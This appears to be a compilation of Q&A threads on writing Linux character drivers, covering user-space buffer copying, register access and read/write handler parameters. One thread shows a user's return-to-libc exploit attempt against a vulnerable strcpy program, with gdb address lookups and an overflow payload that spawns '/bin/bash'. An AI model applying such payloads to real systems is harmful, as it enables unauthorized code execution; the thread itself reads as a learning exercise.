Understanding of write file operation in char driver - linux-kernel

I am learning char drivers, but I don't properly understand the write operation of a char device driver. Below is my write operation:
static ssize_t dev_write(struct file *fil,const char *buff,size_t len,loff_t *off)
{
int count =0;
int i =0;
int flag=0;
pr_info("user input string %s\n",buff);
pr_info("user input string len %d\n",len);
return len;
}
My question is: if I write to my device like this
echo "hello" > /dev/myDev
The below are contents of dmesg
[20596.975355] user input string hello
[20596.975355] 77b9e4
[20596.975355] insmod insmod
[20596.975355] n/zeitgeist-daemon
[20596.975355] atives
[20596.975355]
[20596.975355] vars "${upargs[#]}"
[20596.975355] cur cword words=();
[20596.975355] local upargs=() upvars=() vcur vcword vprev vwords;
[20596.975355] while getopts "c:i:n:p:w:" flag "$#"; do
[20596.975355] case $flag in
[20596.975355] c)
[20596.975355] vcur=$OPTARG
[20596.975355] ;;
[20596.975355] i)
[20596.975355] vcword=$OPTARG
[20596.975355] ;;
[20596.975355] n)
[20596.975355] exclude=$OPTARG
[20596.975355] ;;
[20596.975355] p)
[20596.975355] vprev=$OPTARG
[20596.975355] ;;
[20596.975355] w)
[20596.975355] vwords=$OPTARG
[20596.975355] ;;
[20596.975358] user input string len 6
[20596.975361] Device closed
So I don't understand what is happening inside. Can anyone please explain it? And how do I access only the user input string, i.e. "hello"? Thanks.

When you run echo against /dev/myDev, the shell opens the file and issues a write() system call from user space. The kernel dispatches that call through the write member of the driver's struct file_operations, which invokes dev_write() in kernel space.
The original definition looks wrong because it is missing the __user annotation on buff, which marks the pointer as referring to the user-space application's buffer. Printing or otherwise dereferencing a user-space buffer directly is not recommended. Here it runs past the bytes that were written and prints a lot of unrelated data, namely whatever happens to follow them in the writing process's memory.
Instead, create a kernel buffer and copy the contents into it with copy_from_user() or simple_write_to_buffer() before printing the buffer to the kernel log. The reason is that kernel pages are normally pinned in memory and are not paged in and out, while user-space pages can be paged out at any time. copy_{from,to}_user() and {get,put}_user() validate the user pointer first and handle any page fault that occurs during the access, returning an error instead of crashing.
For example:
static ssize_t dev_write(struct file *fil,const char __user *buff,size_t len,loff_t *off)
Hope this helps.

%s expects a zero-terminated string, but the buffer for write() contains only as many bytes as were actually written.
Furthermore, user-space buffers might be swapped out, or not exist because the program used a wrong pointer, so you must always use functions like get_user() or copy_from_user() to access user-space buffers.
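Putting both answers together, here is a minimal userspace sketch of the copy the handler should make before printing: take at most a fixed number of bytes, then add the terminator yourself. The names KBUF_SIZE and copy_bounded are hypothetical, and memcpy() stands in for copy_from_user(); in a real driver a nonzero return from copy_from_user() should be turned into -EFAULT.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define KBUF_SIZE 64  /* hypothetical size of the driver's private buffer */

/*
 * Copy at most dst_size - 1 bytes from src into dst and NUL-terminate,
 * so the result is safe to print with %s.
 * Returns the number of bytes actually copied.
 * In a driver, memcpy() would be copy_from_user(dst, src, n).
 */
static size_t copy_bounded(char *dst, size_t dst_size,
                           const char *src, size_t len)
{
    size_t n;

    assert(dst != NULL && src != NULL && dst_size > 0);
    n = len < dst_size - 1 ? len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';   /* write() data carries no terminator of its own */
    return n;
}
```

With echo "hello", len is 6 because echo appends a newline, so a buffer declared as char kbuf[KBUF_SIZE] ends up holding "hello\n" followed by the terminator.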

Related

commenting out a printk statement causes crash in a linux device driver test

I'm seeing a weird case in a simple linux driver test(arm64).
The user program calls ioctl of a device driver and passes array 'arg' of uint64_t as argument. By the way, arg[2] contains a pointer to a variable in the app. Below is the code snippet.
case SetRunParameters:
copy_from_user(args, (void __user *)arg, 8*3);
offs = args[2] % PAGE_SIZE;
down_read(&current->mm->mmap_sem);
res = get_user_pages( (unsigned long)args[2], 1, 1, &pages, NULL);
if (res) {
kv_page_addr = kmap(pages);
kv_addr = ((unsigned long long int)(kv_page_addr)+offs);
args[2] = page_to_phys(pages) + offset; // args[2] changed to physical
}
else {
printk("get_user_pages failed!\n");
}
up_read(&current->mm->mmap_sem);
*(vaddr + REG_IOCTL_ARG/4) = virt_to_phys(args); // from axpu_regs.h
printk("ldd:writing %x at %px\n",cmdx,vaddr + REG_IOCTL_CMD/4); // <== line 248. not ok w/o this printk line why?..
*(vaddr + REG_IOCTL_CMD/4) = cmdx; // this command is different from ioctl cmd!
put_page(pages); //page_cache_release(page);
break;
case ...
I have marked line 248 in the code above. If I comment out the printk there, a trap occurs and the virtual machine crashes (I'm doing this on a qemu virtual machine). cmdx is an integer value set according to the ioctl command from the app, and vaddr is the virtual address of the device (obtained from ioremap). If I keep the printk, it works as I expect. What could make this happen? (Cache or TLB?)
Accessing memory-mapped registers by simple C constructs such as *(vaddr + REG_IOCTL_ARG/4) is a bad idea. You might get away with it on some platforms if the access is volatile-qualified, but it won't work reliably or at all on some platforms. The proper way to access memory-mapped registers is via the functions declared by #include <asm/io.h> or #include <linux/io.h>. These will take care of any arch-specific requirements to ensure that writes are properly ordered as far as the CPU is concerned [1].
The functions for memory-mapped register access are described in the Linux kernel documentation under Bus-Independent Device Accesses.
This code:
*(vaddr + REG_IOCTL_ARG/4) = virt_to_phys(args);
*(vaddr + REG_IOCTL_CMD/4) = cmdx;
can be rewritten as:
writel(virt_to_phys(args), vaddr + REG_IOCTL_ARG/4);
writel(cmdx, vaddr + REG_IOCTL_CMD/4);
[1] Write-ordering for specific bus types such as PCI may need extra code to read a register in between writes to different registers if the ordering of the register writes is important. That is because writes are "posted" asynchronously to the PCI bus, and the PCI device may process writes to different registers out of order. An intermediate register read will not be handled by the device until all preceding writes have been handled, so it can be used to enforce ordering of posted writes.

how to transfer string(char*) in kernel into user process using copy_to_user

I'm writing code to transfer a string from the kernel to user mode using a system call and copy_to_user.
Here is my code.
kernel
#include<linux/kernel.h>
#include<linux/syscalls.h>
#include<linux/sched.h>
#include<linux/slab.h>
#include<linux/errno.h>
asmlinkage int sys_getProcTagSysCall(pid_t pid, char **tag){
printk("getProcTag system call \n\n");
struct task_struct *task= (struct task_struct*) kmalloc(sizeof(struct task_struct),GFP_KERNEL);
read_lock(&tasklist_lock);
task = find_task_by_vpid(pid);
if(task == NULL )
{
printk("corresponding pid task does not exist\n");
read_unlock(&tasklist_lock);
return -EFAULT;
}
read_unlock(&tasklist_lock);
printk("Corresponding pid task exist \n");
printk("tag is %s\n" , task->tag);
/*
task -> tag : string is stored in task->tag (ex : "abcde")
this part is well worked
*/
if(copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) !=0)
;
return 1;
}
and this is user
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *ret=NULL;
int pid = 0;
printf("PID : ");
scanf("%4d", &pid);
if(syscall(339, pid, &ret)!=1) // syscall 339 is getProcTagSysCall
printf("pid %d does not exist\n", pid);
else
printf("Corresponding pid tag is %s \n",ret); //my output is %s = null
return 0;
}
Actually, I don't know copy_to_user well, but I think copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) operates like the code below,
so I used copy_to_user as shown above.
#include<stdio.h>
int re();
void main(){
char *b = NULL;
if (re(&b))
printf("success");
printf("%s", b);
}
int re(char **str){
char *temp = "Gdg";
*str = temp;
return 1;
}
Is this a college assignment of some sort?
asmlinkage int sys_getProcTagSysCall(pid_t pid, char **tag){
What is this, Linux 2.6? What's up with ** instead of *?
printk("getProcTag system call \n\n");
Somewhat bad. All printk strings are supposed to be prefixed with a log level (e.g. KERN_INFO).
struct task_struct *task= (struct task_struct*) kmalloc(sizeof(struct task_struct),GFP_KERNEL);
What is going on here? Casting the result of kmalloc makes no sense whatsoever; if you do allocate, you should use sizeof(*task) instead, but you should not allocate in the first place. You want to find a task, and in fact you just overwrite this pointer's value a few lines later anyway.
read_lock(&tasklist_lock);
task = find_task_by_vpid(pid);
find_task_by_vpid requires RCU. The kernel would have told you that if you had debug enabled.
if(task == NULL )
{
printk("corresponding pid task does not exist\n");
read_unlock(&tasklist_lock);
return -EFAULT;
}
read_unlock(&tasklist_lock);
So... you unlock... but you did not get any kind of reference to the task.
printk("Corresponding pid task exist \n");
printk("tag is %s\n" , task->tag);
... in other words by the time you do task->tag, the task may already be gone. What requirements are there to access ->tag itself?
if(copy_to_user(*tag, task->tag, sizeof(char) * task->tag_length) !=0)
;
What's up with this? sizeof(char) is guaranteed to be 1.
I'm really confused by this entire business.
When you have a syscall which copies data to userspace where the amount of data is not known prior to the call, the syscall accepts both a buffer AND its size. Then you can return an appropriate error if the data you are trying to copy would not fit.
However, having a syscall in the first place looks incorrect. In Linux, per-task data is exposed to userspace in /proc/pid/. Figuring out how to add a file to proc is easy and left as an exercise for the reader.
It's quite obvious from the way you fixed it. copy_to_user() will only copy data between two memory regions - one accessible only to kernel and the other accessible also to user. It will not, however, handle any memory allocation. Userspace buffer has to be already allocated and you should pass address of this buffer to the kernel.
One more thing you can change is to change your syscall to use normal pointer to char instead of pointer to pointer which is useless.
Also note that you are leaking memory in your kernel code. You allocate memory for task_struct using kmalloc and then you override the only pointer you have to this memory when calling find_task_by_vpid() and this memory is never freed. find_task_by_vpid() will return a pointer to a task_struct which already exists in memory so there is no need to allocate any buffer for this.
I solved my problem by allocating the buffer with malloc in user space.
I changed
char *b = NULL;
to
char *b = (char*)malloc(sizeof(char) * 100)
I don't know why this works properly, but my guess is that since copy_to_user takes a byte count as its third argument, I have to malloc the buffer before a value can be assigned to it.
If anyone knows why adding malloc makes it work, please tell me.
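The malloc version works because the copy needs a destination that already exists: with char *ret = NULL there is no memory to write into, and the kernel code ignores the failure that copy_to_user() reports. Below is a userspace sketch of the buffer-plus-size convention described above, not the asker's syscall. The name copy_out is hypothetical and memcpy() stands in for copy_to_user().

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

/*
 * Copy klen bytes of kernel-side data into a caller-supplied buffer.
 * Returns the number of bytes written, -EFAULT if no buffer was given,
 * or -ERANGE if the buffer is too small to hold the data.
 */
static long copy_out(char *ubuf, size_t ubuf_len,
                     const char *kdata, size_t klen)
{
    assert(kdata != NULL);      /* kernel-side data is our own invariant */
    if (ubuf == NULL)
        return -EFAULT;         /* nothing to write into */
    if (ubuf_len < klen)
        return -ERANGE;         /* caller's buffer is too small */
    memcpy(ubuf, kdata, klen);  /* copy_to_user() in a real syscall */
    return (long)klen;
}
```

A caller that owns a 100-byte buffer, as in the fixed user program, would pass the buffer and its size and check the return value before printing the result.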

Read system call gives wrong count size?

I have created a misc driver and written a sample read function like this:
static ssize_t test_read(struct file *file, char __user *buffer,
size_t count, loff_t *ppos)
{
pr_info("Count arg : %d\n",count);
return ret;
}
I now try to read the device using a userspace code as shown below
uint64_t read_buff;
fread(&read_buff, sizeof(read_buff), 1, fp)
The dmesg log I get is
[ 1593.273163] Count arg : 4096
I was expecting it to be of the size of uint64_t. Could anybody point me why I get an unexpected value?
It seems that fread() buffers data in userland: it asks the kernel for a whole buffer's worth and serves your 8 bytes from that. I found the source code of one fread() implementation that buffers data (in __srefill()), so this behavior is expected.
If you want to avoid such unexpected results, go one level lower and call read() directly in userland.
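A minimal sketch of the read() approach, assuming a POSIX system. The helper name read_u64 is hypothetical, and the path argument would be your device node.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

/*
 * Read one uint64_t with a single read() call, bypassing stdio buffering.
 * Returns the byte count read() reported, or -1 if the file cannot be opened.
 */
static ssize_t read_u64(const char *path, uint64_t *out)
{
    int fd;
    ssize_t n;

    assert(path != NULL && out != NULL);
    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    n = read(fd, out, sizeof(*out));   /* the driver sees count == 8 */
    close(fd);
    return n;
}
```

Because no stdio layer sits in between, the count argument that reaches the driver's read handler is exactly sizeof(uint64_t).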

I want to try a return-to-libc attack

The program I want to attack is the following:
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
It is in redhat 6.2, so I didn't think there was anything to consider.
So I tried this:
(gdb) b main
Breakpoint 1 at 0x8048439
(gdb) r
Starting program: /home/asdf/asdfghj
Breakpoint 1, 0x8048439 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) x/s 0xbfffff8e
0xbfffff8e: "/bin/bash"
(gdb) q
So my payload looked like this, the first 260 bytes being the buffer+sfp, then the address of the system function, a 4 byte dummy, and the address of the argument, "/bin/bash".
./asdfghj `perl -e 'print "\x90"x260, "\xe0\x8a\x05\x40", "AAAA", "\x8e\xff\xff\xbf"'`
However this still gives me only a segmentation fault. I have no idea how to fix this, and the addresses come from the dumped core of the program which I set a breakpoint, ran it, then got the addresses.
What should I check to successfully attack the program and what do you think is the problem? Is it that I use /bin/bash, or any of the addresses incorrect?
Plus, I've already set bash2 for default.
Thanks. :)

Regarding how the parameters to the read function is passed in simple char driver

I am a newbie to driver programming and have started writing a simple char driver. I created a special file for my char driver with mknod /dev/simple-driver c 250 0. When I type cat /dev/simple-driver, it shows the string "Hello world from Kernel mode!". I know that the function
static const char g_s_Hello_World_string[] = "Hello world tamil_vanan!\n\0";
static const ssize_t g_s_Hello_World_size = sizeof(g_s_Hello_World_string);
static ssize_t device_file_read(
struct file *file_ptr
, char __user *user_buffer
, size_t count
, loff_t *possition)
{
printk( KERN_NOTICE "Simple-driver: Device file is read at offset = %i, read bytes count = %u", (int)*possition , (unsigned int)count );
if( *possition >= g_s_Hello_World_size )
return 0;
if( *possition + count > g_s_Hello_World_size )
count = g_s_Hello_World_size - *possition;
if( copy_to_user(user_buffer, g_s_Hello_World_string + *possition, count) != 0 )
return -EFAULT;
*possition += count;
return count;
}
gets called. It is mapped to (*read) in the file_operations structure of my driver. My question is how this function gets called, and how the parameters such as struct file, the char buffer, count and offset are passed, because I simply typed the cat command. Please elaborate on how this happens.
In Linux, everything is treated as a file. Whether a file is a device file or a regular file is recorded in its inode, not in its name or location.
For example, in your case cat /dev/simple-driver opens the device file, and the path lookup reaches the device node you created with mknod.
From the device node simple-driver the kernel retrieves the major and minor numbers.
From those numbers (chiefly the major number) it finds the character driver registered for the device.
From the driver it uses the struct file_operations structure to find the read function, which is your read function:
static ssize_t device_file_read(struct file *file_ptr, char __user *user_buffer, size_t count, loff_t *possition)
count is the size of the buffer that cat passed to read(), so user_buffer can hold at most count bytes. It is better to check your data length against it before copying.
The string is copied to user_buffer with copy_to_user(), which checks that the destination is a valid user-space address during the copy.
position is 0 for the first read and advances by the number of bytes copied: position += count.
Once the read function returns, the data is in cat's buffer, and cat writes the buffer contents to stdout, which is your console.
cat will use some posix version of read call from glibc. Glibc will put the arguments on the stack or in registers (this depends on your hardware architecture) and will switch to kernel mode. In the kernel the values will be copied to the kernel stack. And in the end your read function will be called.
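The offset handling is easiest to see by calling the function the way cat does: repeatedly, until it returns 0. Below is a userspace model of the same clamping logic, with memcpy() in place of copy_to_user(). The names msg, msg_size and model_read are hypothetical, and the payload is illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

static const char msg[] = "Hello\n";            /* illustrative payload */
static const size_t msg_size = sizeof(msg) - 1; /* 6, without the NUL */

/*
 * Same clamping logic as device_file_read(), with memcpy() in place of
 * copy_to_user(). Returns bytes copied, or 0 at end of data.
 */
static long model_read(char *dst, size_t count, long long *pos)
{
    assert(dst != NULL && pos != NULL && *pos >= 0);
    if ((size_t)*pos >= msg_size)
        return 0;                       /* end of data: the caller stops */
    if ((size_t)*pos + count > msg_size)
        count = msg_size - (size_t)*pos;
    memcpy(dst, msg + *pos, count);
    *pos += (long long)count;           /* next call resumes from here */
    return (long)count;
}
```

The kernel keeps the position in the open file and passes a pointer to it on every call, which is why the second read continues where the first stopped and a later one reports end of file.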
